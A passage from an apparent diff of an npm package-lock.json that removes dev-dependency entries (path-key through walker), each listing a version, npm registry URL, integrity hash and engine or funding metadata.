"sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha1-F0uSaHNVNP+8es5r9TpanhtcX18=", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "node_modules/performance-now": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", - "integrity": "sha1-Ywn04OX6kT7BxpMHrjZLSzd8nns=", - "dev": true - }, - "node_modules/picocolors": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz", - "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==", - "dev": true - }, - "node_modules/picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", - "dev": true, - "engines": { - "node": ">=8.6" - }, - "funding": { - "url": "https://github.com/sponsors/jonschlinkert" - } - }, - "node_modules/pirates": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.5.tgz", - "integrity": "sha512-8V9+HQPupnaXMA23c5hvl69zXvTwTzyAYasnkb0Tts4XvO4CliqONMOnvlq26rkhLC3nWDFBJf73LU1e1VZLaQ==", - "dev": true, - "engines": { - "node": ">= 6" - } - }, - "node_modules/pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "dependencies": { - "find-up": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/prettier": { - "version": "3.4.2", - "resolved": "https://registry.npmjs.org/prettier/-/prettier-3.4.2.tgz", - "integrity": "sha512-e9MewbtFo+Fevyuxn/4rrcDAaq0IYxPGLvObpQjiZBMAzB9IGmzlnG9RZy3FFas+eBMu2vA0CszMeduow5dIuQ==", - "dev": true, - "bin": { - "prettier": "bin/prettier.cjs" - }, - "engines": { - "node": ">=14" - }, - "funding": { - "url": "https://github.com/prettier/prettier?sponsor=1" - } - }, - "node_modules/pretty-format": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.7.0.tgz", - "integrity": "sha512-Pdlw/oPxN+aXdmM9R00JVC9WVFoCLTKJvDVLgmJ+qAffBMxsV85l/Lu7sNx4zSzPyoL2euImuEwHhOXdEgNFZQ==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.6.3", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/pretty-format/node_modules/ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "dependencies": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/psl": { - "version": "1.8.0", - "resolved": "https://registry.npmjs.org/psl/-/psl-1.8.0.tgz", - "integrity": "sha512-RIdOzyoavK+hA18OGGWDqUTsCLhtA7IcZ/6NCs4fFJaHBDab+pDDmDIByWFRQJq2Cd7r1OoQxBGKOaztq+hjIQ==", - "dev": true - }, - "node_modules/punycode": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.1.1.tgz", - "integrity": "sha512-XRsRjdf+j5ml+y/6GKHPZbrF/8p2Yga0JPtdqTIY2Xe5ohJPD9saDJJLPvp9+NSBprVvevdXZybnj2cv8OEd0A==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/pure-rand": { - "version": "6.1.0", - "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.1.0.tgz", - "integrity": "sha512-bVWawvoZoBYpp6yIoQtQXHZjmz35RSVHnUOTefl8Vcjr8snTPY1wnpSPMWekcFwbxI6gtmT7rSYPFvz71ldiOA==", - "dev": true, - "funding": [ - { - "type": "individual", - "url": "https://github.com/sponsors/dubzzz" - }, - { - "type": "opencollective", - "url": "https://opencollective.com/fast-check" - } - ] - }, - "node_modules/qs": { - "version": "6.5.3", - "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", - "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", - "dev": true, - "engines": { - "node": ">=0.6" - } - }, - "node_modules/react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", - "dev": true - }, - "node_modules/request": { - "version": "2.88.2", - "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", - "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", - "deprecated": "request has been deprecated, see https://github.com/request/request/issues/3142", - "dev": true, - "dependencies": { - "aws-sign2": "~0.7.0", - "aws4": "^1.8.0", - "caseless": "~0.12.0", - "combined-stream": "~1.0.6", - "extend": "~3.0.2", - "forever-agent": "~0.6.1", - "form-data": "~2.3.2", - "har-validator": "~5.1.3", - "http-signature": "~1.2.0", - "is-typedarray": "~1.0.0", - "isstream": "~0.1.2", - "json-stringify-safe": "~5.0.1", - "mime-types": "~2.1.19", - "oauth-sign": "~0.9.0", - "performance-now": "^2.1.0", - "qs": "~6.5.2", - "safe-buffer": "^5.1.2", - "tough-cookie": "~2.5.0", - "tunnel-agent": "^0.6.0", - "uuid": "^3.3.2" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/request/node_modules/form-data": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", - "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", - "dev": true, - "dependencies": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - }, - "engines": { - "node": ">= 0.12" - } - }, - "node_modules/require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/resolve": { - "version": "1.22.8", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", - "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", - "dev": true, - "dependencies": { - "is-core-module": "^2.13.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" - }, - "bin": { - "resolve": "bin/resolve" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "dependencies": { - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve.exports": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", - "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/rfc4648": { - "version": "1.5.1", - "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.1.tgz", - "integrity": "sha512-60e/YWs2/D3MV1ErdjhJHcmlgnyLUiG4X/14dgsfm9/zmCWLN16xI6YqJYSCd/OANM7bUNzJqPY5B8/02S9Ibw==", - "dev": true - }, - "node_modules/safe-buffer": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", - "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==", - "dev": true - }, - "node_modules/safer-buffer": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", - "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==", - "dev": true - }, - "node_modules/semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - } - }, - "node_modules/shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "dev": true, - "dependencies": { - "shebang-regex": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "node_modules/sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, - "node_modules/slash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "dependencies": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "node_modules/sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", - "dev": true - }, - "node_modules/sshpk": { - "version": "1.17.0", - "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.17.0.tgz", - "integrity": "sha512-/9HIEs1ZXGhSPE8X6Ccm7Nam1z8KcoCqPdI7ecm1N33EzAetWahvQWVqLZtaZQ+IDKX4IyA2o0gBzqIMkAagHQ==", - "dev": true, - "dependencies": { - "asn1": "~0.2.3", - "assert-plus": "^1.0.0", - "bcrypt-pbkdf": "^1.0.0", - "dashdash": "^1.12.0", - "ecc-jsbn": "~0.1.1", - "getpass": "^0.1.1", - "jsbn": "~0.1.0", - "safer-buffer": "^2.0.2", - "tweetnacl": "~0.14.0" - }, - "bin": { - "sshpk-conv": "bin/sshpk-conv", - "sshpk-sign": "bin/sshpk-sign", - "sshpk-verify": "bin/sshpk-verify" - }, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/stack-utils": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", - "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", - "dev": true, - "dependencies": { - "escape-string-regexp": "^2.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/stream-buffers": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", - "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==", - "dev": true, - "engines": { - "node": ">= 0.10.0" - } - }, - "node_modules/string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "dependencies": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dev": true, - "dependencies": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dev": true, - "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/supports-color": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", - "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true, - "engines": { - "node": ">= 0.4" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/tar": { - "version": "6.2.1", - "resolved": "https://registry.npmjs.org/tar/-/tar-6.2.1.tgz", - "integrity": "sha512-DZ4yORTwrbTj/7MZYq2w+/ZFdI6OZ/f9SFHR+71gIVUZhOQPHzVCLpvRnPgyaMpfWxxk/4ONva3GQSyNIKRv6A==", - "dev": true, - "dependencies": { - "chownr": "^2.0.0", - "fs-minipass": "^2.0.0", - "minipass": "^5.0.0", - "minizlib": "^2.1.1", - "mkdirp": "^1.0.3", - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/tar/node_modules/minipass": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-5.0.0.tgz", - "integrity": "sha512-3FnjYuehv9k6ovOEbyOswadCDPX1piCfhV8ncmYtHOjuPwylVWsghTLo7rabjC3Rx5xD4HDx8Wm1xnMF7S5qFQ==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "dependencies": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "node_modules/to-regex-range": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", - "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", - "dev": true, - "dependencies": { - "is-number": "^7.0.0" - }, - "engines": { - "node": ">=8.0" - } - }, - "node_modules/tough-cookie": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", - "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", - "dev": true, - "dependencies": { - "psl": "^1.1.28", - "punycode": "^2.1.1" - }, - "engines": { - "node": ">=0.8" - } - }, - "node_modules/ts-jest": { - "version": "29.2.5", - "resolved": "https://registry.npmjs.org/ts-jest/-/ts-jest-29.2.5.tgz", - "integrity": "sha512-KD8zB2aAZrcKIdGk4OwpJggeLcH1FgrICqDSROWqlnJXGCXK4Mn6FcdK2B6670Xr73lHMG1kHw8R87A0ecZ+vA==", - "dev": true, - "dependencies": { - "bs-logger": "^0.2.6", - "ejs": "^3.1.10", - "fast-json-stable-stringify": "^2.1.0", - "jest-util": "^29.0.0", - "json5": "^2.2.3", - "lodash.memoize": "^4.1.2", - "make-error": "^1.3.6", - "semver": "^7.6.3", - "yargs-parser": "^21.1.1" - }, - "bin": { - "ts-jest": "cli.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || ^18.0.0 || >=20.0.0" - }, - "peerDependencies": { - "@babel/core": ">=7.0.0-beta.0 <8", - "@jest/transform": "^29.0.0", - "@jest/types": "^29.0.0", - "babel-jest": "^29.0.0", - "jest": "^29.0.0", - "typescript": ">=4.3 <6" - }, - "peerDependenciesMeta": { - "@babel/core": { - "optional": true - }, - "@jest/transform": { - "optional": true - }, - "@jest/types": { - "optional": true - }, - "babel-jest": { - "optional": true - }, - "esbuild": { - "optional": true - } - } - }, - "node_modules/ts-jest/node_modules/semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/tslib": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.5.0.tgz", - "integrity": "sha512-336iVw3rtn2BUK7ORdIAHTyxHGRIHVReokCR3XjbckJMK7ms8FysBfhLR8IXnAgy7T0PTPNBWKiH514FOW/WSg==", - "dev": true - }, - "node_modules/tunnel-agent": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", - "integrity": "sha1-J6XeoGs2sEoKmWZ3SykIaPD8QP0=", - "dev": true, - "dependencies": { - "safe-buffer": "^5.0.1" - }, - "engines": { - "node": "*" - } - }, - "node_modules/tweetnacl": { - "version": "0.14.5", - "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", - "integrity": "sha1-WuaBd/GS1EViadEIr6k/+HQ/T2Q=", - "dev": true - }, - "node_modules/type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/typescript": { - "version": "5.7.2", - "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.7.2.tgz", - "integrity": "sha512-i5t66RHxDvVN40HfDd1PsEThGNnlMCMT3jMUuoh9/0TaqWevNontacunWyN02LA9/fIbEWlcHZcgTKb9QoaLfg==", - "dev": true, - "peer": true, - "bin": { - "tsc": "bin/tsc", - "tsserver": "bin/tsserver" - }, - "engines": { - "node": ">=14.17" - } - }, - "node_modules/undici-types": { - "version": "6.19.8", - "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.19.8.tgz", - "integrity": "sha512-ve2KP6f/JnbPBFyobGHuerC9g1FYGn/F8n1LWTwNxCEzd6IfqTwUQcNXgEtmmQ6DlRrC1hrSrBnCZPokRrDHjw==", - "dev": true - }, - "node_modules/update-browserslist-db": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.1.1.tgz", - "integrity": "sha512-R8UzCaa9Az+38REPiJ1tXlImTJXlVfgHZsglwBD/k6nj76ctsH1E3q4doGrukiLQd3sGQYu56r5+lo5r94l29A==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ], - "dependencies": { - "escalade": "^3.2.0", - "picocolors": "^1.1.0" - }, - "bin": { - "update-browserslist-db": "cli.js" - }, - "peerDependencies": { - "browserslist": ">= 4.21.0" - } - }, - "node_modules/uri-js": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", - "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", - "dev": true, - "dependencies": { - "punycode": "^2.1.0" - } - }, - "node_modules/uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", - "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. See https://v8.dev/blog/math-random for details.", - "dev": true, - "bin": { - "uuid": "bin/uuid" - } - }, - "node_modules/v8-to-istanbul": { - "version": "9.3.0", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.3.0.tgz", - "integrity": "sha512-kiGUalWN+rgBJ/1OHZsBtU4rXZOfj/7rKQxULKlIzwzQSvMJUUNgPwJEEh7gU6xEVxC0ahoOBvN2YI8GH6FNgA==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^2.0.0" - }, - "engines": { - "node": ">=10.12.0" - } - }, - "node_modules/verror": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", - "integrity": "sha1-OhBcoXBTr1XW4nDB+CiGguGNpAA=", - "dev": true, - "engines": [ - "node >=0.6.0" - ], - "dependencies": { - "assert-plus": "^1.0.0", - "core-util-is": "1.0.2", - "extsprintf": "^1.2.0" - } - }, - "node_modules/walker": { - "version": "1.0.8", - "resolved": 